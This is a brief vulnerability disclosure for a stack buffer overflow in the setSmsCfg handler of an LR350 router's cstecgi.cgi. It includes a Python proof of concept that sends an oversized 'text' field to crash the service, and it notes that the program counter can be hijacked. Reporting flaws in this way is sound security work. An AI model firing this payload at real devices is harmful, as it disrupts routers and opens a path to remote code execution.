Hi, we found a post-authentication stack buffer overflow at **LR350 (**Firmware version V9.3.5u.6369_B20220309), and contact you at the first time.

In function setSmsCfg of the file /cgi-bin/cstecgi.cgi, the size of text is not checked, and overflow buffer v11 via strcpy in replace_string.

PoC

import requests

url = "<http://192.168.17.220:80/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"uid=1234"}
data = {'topicurl' : "setSmsCfg",
"text" : "a"*2000}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)

The PC register can be hijacked, which means it can result in RCE.